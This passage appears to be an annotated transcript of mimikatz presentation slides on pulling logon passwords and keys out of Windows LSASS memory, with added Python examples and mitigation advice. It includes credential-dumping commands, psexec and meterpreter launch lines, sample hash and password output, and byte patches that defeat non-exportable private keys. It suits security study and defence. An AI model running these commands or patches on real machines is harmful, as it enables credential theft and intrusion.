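OFF_FLINK, OFF_BLINK, OFF_USAGE, OFF_THIS, OFF_LUID = 0x00, 0x08, 0x10, 0x18, 0x20
OFF_USER, OFF_DOMAIN, OFF_PASSWORD, ENTRY_SIZE = 0x28, 0x38, 0x48, 0x58
# LSA_UNICODE_STRING (x64): USHORT Length, USHORT MaximumLength, 4 pad bytes, PWSTR Buffer
UNISTR = struct.Struct("<HH4xQ")


class Memory:
    """Read-only view of a region of another process's memory captured at `base`."""

    def __init__(self, base, blob):
        self.base, self.blob = base, bytes(blob)

    def read(self, addr, size):
        off = addr - self.base
        if off < 0 or off + size > len(self.blob):
            raise ValueError("read outside captured region: %#x+%d" % (addr, size))
        return self.blob[off:off + size]

    def u64(self, addr):
        return struct.unpack("<Q", self.read(addr, 8))[0]

    def unicode_string(self, addr):
        """Raw Buffer bytes (Length bytes, no terminator) of an LSA_UNICODE_STRING."""
        length, _max_length, buffer = UNISTR.unpack(self.read(addr, UNISTR.size))
        return self.read(buffer, length) if length else b""


def walk_list(mem, head, limit=4096):
    """Yield entry addresses of the doubly linked ring whose sentinel LIST_ENTRY is
    `head`; the ring ends when Flink points back at the sentinel."""
    cur, seen = mem.u64(head + OFF_FLINK), 0
    while cur != head:
        if seen >= limit:
            raise RuntimeError("list never returns to its head (corrupt, or wrong symbol)")
        yield cur
        cur, seen = mem.u64(cur + OFF_FLINK), seen + 1


def lsa_key_for(blob_len):
    """NT6 LsaEncryptMemory rule from the slide: length multiple of 8 -> 3DES, else AES.
    Returns (lsasrv key symbol, chaining mode, IV bytes taken from lsasrv!InitializationVector)."""
    return ("h3DesKey", "CBC", 8) if blob_len % 8 == 0 else ("hAesKey", "CFB", 16)


def find_credential(mem, head, luid):
    """The entry for `luid` (as returned by LsaEnumerateLogonSessions), or None.
    The password comes back still protected: the keys only exist inside LSASS."""
    for entry in walk_list(mem, head):
        if mem.u64(entry + OFF_LUID) != luid:
            continue
        blob = mem.unicode_string(entry + OFF_PASSWORD)
        key, mode, iv_len = lsa_key_for(len(blob))
        return {"user": mem.unicode_string(entry + OFF_USER).decode("utf-16-le"),
                "domain": mem.unicode_string(entry + OFF_DOMAIN).decode("utf-16-le"),
                "protected_password": blob, "unprotect_with": key, "mode": mode, "iv_bytes": iv_len}
    return None


def build_sample_image(base=0x7FF612340000):
    """Constructed region: sentinel head, two session entries, string buffers after them."""
    sessions = [(0x3E7, "Gentil Kiwi", "vm-w8-rp-x", b"\x11" * 16),   # 16-byte blob -> 3DES
                (0x3E5, "svc_backup", "vm-w8-rp-x", b"\x22" * 18)]    # 18-byte blob -> AES
    head = base
    entries = [base + ENTRY_SIZE * (i + 1) for i in range(len(sessions))]
    ring = [head] + entries + [head]
    img = bytearray(ENTRY_SIZE * (len(sessions) + 1))
    strings = bytearray()
    str_base = base + len(img)

    def put_unistr(off, data):
        addr = str_base + len(strings)
        strings.extend(data)
        img[off:off + UNISTR.size] = UNISTR.pack(len(data), len(data), addr)

    img[OFF_FLINK:OFF_FLINK + 8] = struct.pack("<Q", ring[1])
    img[OFF_BLINK:OFF_BLINK + 8] = struct.pack("<Q", ring[-2])
    for i, (luid, user, domain, blob) in enumerate(sessions):
        e = ENTRY_SIZE * (i + 1)
        img[e + OFF_FLINK:e + OFF_FLINK + 8] = struct.pack("<Q", ring[i + 2])
        img[e + OFF_BLINK:e + OFF_BLINK + 8] = struct.pack("<Q", ring[i])
        img[e + OFF_USAGE:e + OFF_USAGE + 4] = struct.pack("<I", 1)
        img[e + OFF_THIS:e + OFF_THIS + 8] = struct.pack("<Q", entries[i])
        img[e + OFF_LUID:e + OFF_LUID + 8] = struct.pack("<Q", luid)
        put_unistr(e + OFF_USER, user.encode("utf-16-le"))
        put_unistr(e + OFF_DOMAIN, domain.encode("utf-16-le"))
        put_unistr(e + OFF_PASSWORD, blob)
    return Memory(base, img + strings), head


if __name__ == "__main__":
    mem, head = build_sample_image()
    for luid in (0x3E7, 0x3E5):
        print(hex(luid), find_credential(mem, head, luid))
```

Two details matter in practice: the walk terminates on the sentinel, not on a NULL Flink, and it is bounded, so a wrong head symbol or a torn list cannot spin forever; and every pointer dereference goes through a bounds-checked reader, since a stale Buffer pointer in a live LSASS snapshot is the normal case, not the exception.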
mimikatz :: sekurlsa – memo
Security Packages
Package          Symbols                                                   Type
tspkg            tspkg!TSGlobalCredTable                                   RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                                     LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList                        LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList                             LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                      RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount    LIST_ENTRY / ULONG

Protection Keys
Key     NT 5 Symbols
RC4     lsasrv!g_cbRandomKey / lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey / lsasrv!g_Feedback

Key     NT 6 Symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz :: sekurlsa – memo
Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Request to ENABLE privilege : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentication Id      : 0;234870
Authentication package : NTLM
Principal user         : Gentil Kiwi
Authentication domain  : vm-w8-rp-x
    msv1_0 :
     * User      : Gentil Kiwi
     * Domain    : vm-w8-rp-x
     * LM hash   : d0e9aee149655a6075e4540af1f22d3b
     * NTLM hash : cc36cf7a8514893efccd332446158b1a
    kerberos :
     * User      : Gentil Kiwi
     * Domain    : vm-w8-rp-x
     * Password  : waza1234
    wdigest :
     * User      : Gentil Kiwi
     * Domain    : vm-w8-rp-x
     * Password  : waza1234
    tspkg :
     * User      : Gentil Kiwi
     * Domain    : vm-w8-rp-x
     * Password  : waza1234
    livessp : n.t. (LUID KO)
mimikatz :: sekurlsa – what we can do
Basics
 – No physical access to computers (first step to pass the hash, then pass the pass)
 – No admin rights / system rights / debug privileges (…)
 – Disable local admin accounts
 – Strong passwords (haha, it was a joke: so useless ;))
 – For privileged accounts, network logon instead of interactive (when possible)
 – Audit: pass the hash leaves traces and can lock accounts
 – No admin rights / system rights / debug privileges, even for VIPs
 – Use separate networks (or forests) for privileged tasks
More in depth
 – Force strong authentication (SmartCard & Token) $ €
 – Short validity for Kerberos tickets
 – No delegation
 – Disable NTLM (available with NT6)
 – Nothing exotic:
   • biometrics (it keeps the password somewhere and pushes it to Windows)
   • single sign on
 – Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
 – Take the opportunities to stop retro-compatibility
 – Disable faulty providers
   • Is it supported by Microsoft?
   • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto – what is it?
A little module that I wrote to:
 – play with the Windows Cryptographic API, CNG and RSA keys
 – automate the export of certificates/keys
   • Even those which are “not” exportable
What the crypto module can do:
 – List
   • Providers
   • Stores
   • Certificates
   • Keys
 – Export
   • Certificates
     – public, in DER format
     – with private keys, in PFX format
   • Private keys in PVK format – it's cool, OpenSSL can deal with it too
 – Patch
   • CryptoAPI, in mimikatz context
   • CNG, in LSASS context (again ;))
mod_mimikatz_crypto
mimikatz :: crypto – how it's protected
Private keys are DPAPI protected
 – You cannot reuse private key files on another computer
   • At least not without the master keys and/or the users' password
Computer/User can load their own keys because they have enough secrets to do it (e.g. a session is opened)
 – Yes, a computer/server opens a “session”
Export/Usage can be limited by:
 – Password
 – Popup
   (Password / Popup: a constraint for most users; unavailable for computer keys)
 – Export/Archive flag not present
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi – how it works
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.” – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, …
 – cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi – how it's exported ( level)
[Diagram: inside the application process itself, CryptoAPI and the RSA CSP load the private key (DPAPI decode) and, when asked to export it, check the Exportable flag: yes → exported key; no → NTE_BAD_KEY_STATE.]
mimikatz :: crypto :: patch::capi – because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work of preparing the export, and checks whether the key is exportable.
mimikatz # crypto::exportCertificates
Location : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
    Key container : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider      : Microsoft Enhanced Cryptographic Provider v1.0
    Type          : AT_KEYEXCHANGE
    Exportable    : NO
    Key size      : 2048
    Private export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO
        (0x8009000b) Key not valid for use in specified state.
    Public export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificate 0 ================
Serial Number: 112169417a1c3ef46a301f99385f50680fa0
Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Subject: CN=Benjamin Delpy, C=FR
Non-root Certificate
Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.
mimikatz :: crypto :: patch::capi – because I own my process
So what? A module in my own process tells me I can't do something? CryptoAP I is in my memory space: let's patch it.
I wrote “4” bytes in my memory space:
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
becomes
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
becomes
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
(at each site the two-byte opcode of the near conditional jump, 0F 85, is replaced by a nop plus the one-byte near jmp opcode, 90 E9; the rel32 displacement is unchanged, so two bytes change per site, four in total)
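Both patches, the one byte written into ncrypt for CNG and the two bytes at each of the two rsaenh sites for CryptoAPI, are the same transformation: the conditional jump that guards the export check becomes unconditional without changing its displacement, so nothing after it moves. The Python below is an added example of mine, not mimikatz code. It applies that rewrite to a byte buffer for the short form (75 cb → EB cb) and the near form (0F 85 cd → 90 E9 cd), and also does the defender's half of the job: comparing a module's bytes as loaded against its bytes on disk and naming any difference that is exactly such an export-check bypass. The byte strings are constructed from the opcodes on the slides, embedded in filler at offsets chosen for the example; they are not dumps of the real DLLs.

```python
"""Apply and detect the 'always export' jump patch on x86 code bytes.

Added example for this page, not code from mimikatz: the buffers below are
constructed from the opcode bytes shown on the slides, not dumps of the DLLs."""

JNZ_SHORT, JMP_SHORT = 0x75, 0xEB   # jnz rel8 -> jmp rel8 (ncrypt: one byte changes)
JNZ_NEAR = b"\x0f\x85"              # jnz rel32 (two-byte opcode)
NOP, JMP_NEAR = 0x90, 0xE9          # 0F 85 -> 90 E9 (rsaenh: two bytes change per site)


def patch_jnz_to_jmp(code, offset):
    """Return a copy of `code` in which the jnz at `offset` is an unconditional jmp.

    Only opcode bytes are rewritten; the rel8/rel32 displacement and the total
    length are unchanged, so the jump target and every later instruction keep
    their addresses.  Raises ValueError if there is no jnz at `offset`."""
    buf = bytearray(code)
    if buf[offset] == JNZ_SHORT:
        buf[offset] = JMP_SHORT
    elif bytes(buf[offset:offset + 2]) == JNZ_NEAR:
        buf[offset] = NOP
        buf[offset + 1] = JMP_NEAR
    else:
        raise ValueError("no jnz at offset %#x: %s" % (offset, buf[offset:offset + 2].hex()))
    return bytes(buf)


def classify_patch(on_disk, in_memory, offset):
    """Name the rewrite at `offset` if it is exactly a jnz->jmp patch, else None."""
    d, m = on_disk[offset:offset + 2], in_memory[offset:offset + 2]
    if len(d) < 2 or len(m) < 2:
        return None
    if d[0] == JNZ_SHORT and m[0] == JMP_SHORT and d[1] == m[1]:
        return "jnz short -> jmp short (1 byte)"
    if (d == JNZ_NEAR and m == bytes([NOP, JMP_NEAR])
            and on_disk[offset + 2:offset + 6] == in_memory[offset + 2:offset + 6]):
        return "jnz near -> nop; jmp near (2 bytes)"
    return None


def audit(on_disk, in_memory):
    """Defender's view: compare a module's on-disk bytes with its in-memory bytes
    and return (offset, description) for every modified region."""
    if len(on_disk) != len(in_memory):
        raise ValueError("images differ in size; compare the same section")
    findings, off = [], 0
    while off < len(on_disk):
        if on_disk[off] == in_memory[off]:
            off += 1
            continue
        kind = classify_patch(on_disk, in_memory, off)
        findings.append((off, kind or "unclassified modification"))
        off += 2 if kind and "near" in kind else 1
    return findings


# Constructed sample images: slide opcodes embedded in filler, at example offsets.
NCRYPT_CLEAN = bytes.fromhex("85 c0 75 1c 33 c0 c3")   # test eax,eax / jnz +0x1c / xor eax,eax / ret
NCRYPT_JNZ_OFFSET = 2
RSAENH_CLEAN = bytes.fromhex("0f 85 33 c7 ff ff" + " 90" * 6 + " 0f 85 b6 3b ff ff")
RSAENH_JNZ_OFFSETS = (0, 12)


def patch_cng_like(code=NCRYPT_CLEAN):
    """The one-byte patch from the ncrypt listing (75 1C -> EB 1C)."""
    return patch_jnz_to_jmp(code, NCRYPT_JNZ_OFFSET)


def patch_capi_like(code=RSAENH_CLEAN):
    """The two rsaenh sites (0F 85 cd -> 90 E9 cd), four bytes in total."""
    for off in RSAENH_JNZ_OFFSETS:
        code = patch_jnz_to_jmp(code, off)
    return code


if __name__ == "__main__":
    print(patch_cng_like().hex())
    print(audit(RSAENH_CLEAN, patch_capi_like()))
```

On a live system the comparison that matters is between the mapped image of rsaenh.dll or ncrypt.dll (inside the calling process for CryptoAPI, inside LSASS for CNG) and the file on disk, after accounting for relocations; this example only shows the byte-level logic of the rewrite and of recognising it.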
mimikatz :: crypto :: patch::capi – demo time
Import, export, import as not exportable… export
mimikatz :: crypto :: patch::capi – limitations
Because:
 – I'm lazy
 – I've seen RSA keys in the majority of real-life cases
   • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
 – Microsoft Base Cryptographic Provider v1.0
 – Microsoft Enhanced Cryptographic Provider v1.0
 – Microsoft Enhanced RSA and AES Cryptographic Provider
 – Microsoft RSA SChannel Cryptographic Provider
 – Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest – what is it?

“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]” – Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication

“Common Digest Authentication Scenarios: – Authenticated client access to a Web site – Authenticated client access using SASL – Authenticated client access with integrity protection to a directory service using LDAP” – Microsoft, http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool:
– No password over the network, just hashes
– No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest – what is it?

We speak about hashes, but what hashes?
  H = MD5(HA1:nonce:[…]:HA2)
  • HA1 = MD5(username:realm:password)
  • HA2 = MD5(method:digestURI:[…])

Even after logon, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon.

The WDigest provider must have the elements to compute responses for different servers:
– Username
– Realm (from server)
– Password
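To make the point of this slide concrete, here is an added Python example (not from the slides, and not mimikatz code) that computes the RFC 2617 Digest values HA1, HA2 and the response. It uses the worked vector from RFC 2617 section 3.5 (user "Mufasa", realm "testrealm@host.com", password "Circle Of Life") as constructed input. The server side only needs HA1 for its own realm, but the client side must recompute HA1 for every realm a server hands it, which is exactly why a provider answering arbitrary servers keeps the password (or one HA1 per realm) rather than a single hash.

```python
"""
Added example (not part of the slides or of mimikatz): RFC 2617 Digest
computation, showing why the client cannot get by with one stored hash.
HA1 binds the password to the server-chosen realm: the server stores HA1
for its realm, the client has to derive HA1 for whatever realm it meets.
"""
import hashlib
import hmac


def md5_hex(s: str) -> str:
    """MD5 over the UTF-8 bytes as lowercase hex (Digest is defined over MD5)."""
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); the realm is chosen by the server."""
    return md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth."""
    return md5_hex(f"{method}:{digest_uri}")


def response_from_ha1(h1: str, nonce: str, nc: str, cnonce: str,
                      qop: str, method: str, digest_uri: str) -> str:
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2) for qop=auth (RFC 2617 3.2.2.1)."""
    return md5_hex(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2(method, digest_uri)}")


def client_response(username: str, realm: str, password: str, nonce: str,
                    nc: str, cnonce: str, method: str, digest_uri: str,
                    qop: str = "auth") -> str:
    """Client side: needs the password (or HA1 for this particular realm)."""
    return response_from_ha1(ha1(username, realm, password), nonce, nc, cnonce,
                             qop, method, digest_uri)


def server_verify(stored_ha1: str, nonce: str, nc: str, cnonce: str,
                  method: str, digest_uri: str, response: str,
                  qop: str = "auth") -> bool:
    """Server side: HA1 for its own realm is enough, the password is never needed."""
    expected = response_from_ha1(stored_ha1, nonce, nc, cnonce, qop, method, digest_uri)
    return hmac.compare_digest(expected, response)


# Constructed input: the worked example of RFC 2617 section 3.5.
USER, REALM, PASSWORD = "Mufasa", "testrealm@host.com", "Circle Of Life"
NONCE, NC, CNONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093", "00000001", "0a4f113b"
METHOD, URI = "GET", "/dir/index.html"


def demo() -> dict:
    """Run the exchange once and return what a practitioner would compare."""
    resp = client_response(USER, REALM, PASSWORD, NONCE, NC, CNONCE, METHOD, URI)
    verified = server_verify(ha1(USER, REALM, PASSWORD), NONCE, NC, CNONCE, METHOD, URI, resp)
    # Same user, second realm: HA1 of realm 1 is useless there, the client has
    # to recompute HA1 from the password. This is the slide's argument for
    # WDigest having to keep the password (or an HA1 per realm) around.
    other_ha1 = ha1(USER, "other-realm@host.com", PASSWORD)
    cross_ok = server_verify(other_ha1, NONCE, NC, CNONCE, METHOD, URI, resp)
    return {
        "response": resp,
        "verified": verified,
        "ha1_differs_per_realm": other_ha1 != ha1(USER, REALM, PASSWORD),
        "cross_realm_verifies": cross_ok,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The `response` for the RFC vector is `6629fae49393a05397450978507c4ef1`; the cross-realm check fails, and the two HA1 values differ, which is the whole reason a Digest client needs more than one per-realm secret.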
mimikatz :: sekurlsa :: wdigest – theory

This time we know:
– that WDigest keeps the password in memory « by protocol », for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so protects them with LsaProtectMemory)

LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– Hypothesis seems verified

LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– SpAcceptCredentials takes the clear password in its arguments
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the doubly linked list wdigest!l_LogSessList

.text:7409D151  _DigestCalcHA1@8         call dword ptr [eax+0B4h]
.text:74096C69  _SpAcceptCredentials@16  call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest – workflow

Workflow (diagram): LsaEnumerateLogonSessions → for each LUID → search the linked list wdigest!l_LogSessList for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    […]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest – demo time!

sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp – how?

Actually, I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbols searching

~ Boring ~… let's be more brutal this time: set a WinDBG trap!

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp – how?

Let's log in with a Live account on Windows 8.

After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).

Call stacks caught by the trap (kc, innermost frame first):

lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
  ← our LiveSSP provider

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Yeah! Pass-the-hash capability with Live accounts too…
Live users can log on through RDP via SSO.
mimikatz :: sekurlsa :: livessp – workflow

Workflow (diagram): LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds (KIWI_LIVESSP_PRIMARY_CREDENTIAL) → LsaUnprotectMemory → password in clear

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa

Even if we already have tools for normal accounts, aren't you curious to test one with this trap?

Me, yes!
mimikatz :: sekurlsa :: kerberos

Let's log in with a normal account.

After credentials protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList

Call stacks caught by the trap (kc, innermost frame first):

lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

Kerberos part for the password
Kerberos ticket part? Maybe ;)
mimikatz :: sekurlsa :: kerberos (nt6) – workflow

Workflow (diagram): LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) – workflow

Workflow (diagram): LsaEnumerateLogonSessions → for each LUID → search the linked list kerberos!KerbLogonSessionList for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa – demo time!

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos – “hu?”

Ok, it works…
But why?
Not at all logons on NT5 (an unlock may be needed).

From my understanding of Microsoft's explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy either)

Microsoft's implementation of Kerberos is full of logic…
– For password auth
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth
  • No password on client
  • No hash on client
    – NTLM hash on client…
    – the KDC sends it back as a gift
mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way, to be used.

We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll

For that we previously injected a DLL (sekurlsa.dll) in the LSASS process, to take benefit of its keys when we called it.

Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…

mimikatz can use lsasrv.dll too, and “imports” the keys initialized by LSASS
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz :: sekurlsa – LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx

Diagram (lsasrv globals inside lsass, copied… into the lsasrv loaded by mimikatz, which then calls LsaUnprotectMemory):
  g_cbRandomKey : DWORD (256)
  g_pRandomKey  : BYTE[g_cbRandomKey]
  g_pDESXKey    : BYTE[144]
  g_Feedback    : BYTE[8]
mimikatz :: sekurlsa – LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES

Diagram (lsasrv globals inside lsass, copied… into mimikatz):
  InitializationVector : BYTE[16]
  h3DesKey, hAesKey    : handles to KIWI_BCRYPT_KEY (below)

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;
mimikatz :: sekurlsa – memo

Security Packages

Package         Symbols                                   Type
tspkg           tspkg!TSGlobalCredTable                   RTL_AVL_TABLE
wdigest         wdigest!l_LogSessList                     LIST_ENTRY
livessp         livessp!LiveGlobalLogonSessionList        LIST_ENTRY
kerberos (nt5)  kerberos!KerbLogonSessionList             LIST_ENTRY
